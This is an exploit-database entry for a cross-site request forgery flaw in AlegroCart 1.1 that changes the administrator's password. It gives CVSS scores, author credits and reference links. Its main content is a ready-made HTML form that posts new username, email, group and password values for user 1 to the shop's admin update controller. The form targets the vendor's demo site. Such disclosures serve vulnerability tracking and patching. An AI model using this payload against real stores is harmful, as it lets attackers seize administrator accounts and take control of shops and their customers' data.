Home Of AlegroCart 1.1 Xsrf; Change Administrator Password

2010-05-02 / 2010-05-03
Credit: The.Morpheus
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[#]----------------------------------------------------------------[#] # # [+] Home Of AlegroCart v1.1 - [ Xsrf] Change Administrator Password # # // Author Info # [x] Author: The.Morpheus # [x] Contact: fats0L@windowslive.com<mailto:fats0L@windowslive.com> # [x] Thanks: Trksec.?nfo ~ Nd And Tg Tayfa :P # [x] Date : 01.02.2010 # [#]-------------------------------------------------------------------------------------------[#] # Demo : http://www.alegrocart.com/ # Download : http://forum.alegrocart.com/viewtopic.php?f=8&t=4 # [x] Exploit : # # [ XSRF ] # # [ Login ] # http://[server]/[path]/admin/ # # // Start XSRF |-------------------------------------------------------------------------------| <form action="http://www.alegrocart.com/demo/admin/?controller=user&user_id=1&action=update;action=update" method="post" enctype="multipart/form-data" id="form"> width="185"><span class="required">*</span> Username:</td> <input type="text" name="username" value="admin"> <span class="required">*</span> First Name:</td> <input type="text" name="firstname" value="admin"> <span class="required">*</span> Last Name:</td> <input type="text" name="lastname" value="admin"> <td>E-Mail:</td> <input type="text" name="email" value="admin"></td> <td>User Group:</td> <td><select name="user_group_id"> <option value="1" selected>Top Administrator</option> </select></td> <td>Password:</td> <input type="password" name="password" value="" > <td>Confirm:</td> <input type="password" name="confirm" value=""> </form> |-------------------------------------------------------------------------------| # // End of attack ~ # [#]------------------------------------------------------------------------------------------[#]

References:

http://forum.alegrocart.com/viewtopic.php?f=8&t=54
http://xforce.iss.net/xforce/xfdb/56037
http://secunia.com/advisories/38386
http://packetstormsecurity.org/1002-exploits/alegrocart-xsrf.txt
http://osvdb.org/62073


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top